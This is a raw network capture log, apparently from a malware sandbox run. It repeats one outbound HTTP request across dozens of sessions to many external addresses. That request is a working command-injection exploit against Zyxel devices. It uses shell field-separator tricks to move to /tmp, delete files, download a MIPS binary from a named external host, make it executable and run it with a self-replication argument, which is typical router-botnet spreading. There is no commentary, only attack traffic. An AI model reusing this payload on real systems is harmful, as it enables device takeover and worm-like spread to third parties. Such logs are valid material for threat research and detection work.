                                                        Jan 28, 2024 10:13:03.610651970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7131192.168.2.1445280155.47.220.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610687971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7132192.168.2.145154849.203.169.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610721111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7133192.168.2.1458276110.122.159.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610764027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7134192.168.2.143659624.115.117.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610795975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7135192.168.2.1444318195.249.107.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610847950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7136192.168.2.1451318213.207.24.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610893965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7137192.168.2.1437728213.201.216.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610927105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7138192.168.2.1433976185.67.174.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610968113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7139192.168.2.145222023.144.103.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611013889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7140192.168.2.143723258.198.255.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611046076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7141192.168.2.143748475.144.64.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611104965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7142192.168.2.1453038102.169.223.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611136913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7143192.168.2.1460446140.139.140.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611166000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7144192.168.2.1460238178.168.138.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611212969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7145192.168.2.14448108.96.176.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611239910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7146192.168.2.1445524199.66.125.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611273050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7147192.168.2.144606678.230.187.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611325026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7148192.168.2.1444374212.3.31.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611367941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7149192.168.2.143416687.121.185.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611421108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7150192.168.2.145479283.67.59.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611469030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7151192.168.2.1454370120.207.161.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611490011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7152192.168.2.1459900218.122.20.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611535072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7153192.168.2.1441246140.46.247.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611563921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7154192.168.2.1452996197.167.89.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611593008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7155192.168.2.1460578110.186.58.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611623049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7156192.168.2.1444994110.104.60.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611670017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7157192.168.2.1439754125.141.49.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611689091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7158192.168.2.1444918184.143.65.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611726999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7159192.168.2.1454730128.24.249.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611763954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7160192.168.2.1446334132.5.81.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611787081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7161192.168.2.144446676.108.157.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611825943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7162192.168.2.1451384125.140.68.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611855030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7163192.168.2.144634040.59.211.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611887932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7164192.168.2.1440360222.234.242.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611931086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7165192.168.2.1439420160.41.31.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.611979008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7166192.168.2.144507623.153.130.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612011909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7167192.168.2.1441972171.127.19.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612065077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7168192.168.2.1453690133.26.188.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612118006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7169192.168.2.1438796130.17.7.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612149000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7170192.168.2.144203893.80.167.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612181902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7171192.168.2.143282696.85.44.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612202883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7172192.168.2.143913883.158.197.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612241030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7173192.168.2.145339835.138.82.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612286091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7174192.168.2.14495681.49.114.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612323046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7175192.168.2.1449734133.74.220.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612369061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7176192.168.2.1456442206.159.244.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612390041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7177192.168.2.1457290211.107.141.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612416983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7178192.168.2.145284840.160.136.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612449884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7179192.168.2.1460966169.207.60.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612504005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7180192.168.2.1447216208.224.35.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612540960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7181192.168.2.1452728204.235.253.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612570047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7182192.168.2.1444892159.146.127.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612603903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7183192.168.2.1438314139.248.79.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612654924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7184192.168.2.144497676.59.33.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612710953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7185192.168.2.144315423.5.41.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612739086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7186192.168.2.1434578163.19.253.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612793922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7187192.168.2.1436100161.252.125.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612828016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7188192.168.2.1439184207.3.206.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612859964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7189192.168.2.1444554166.209.113.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612915993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7190192.168.2.1453624139.179.133.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.612953901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7191192.168.2.143661025.160.0.198443
                                                        TimestampBytes transferredDirectionData
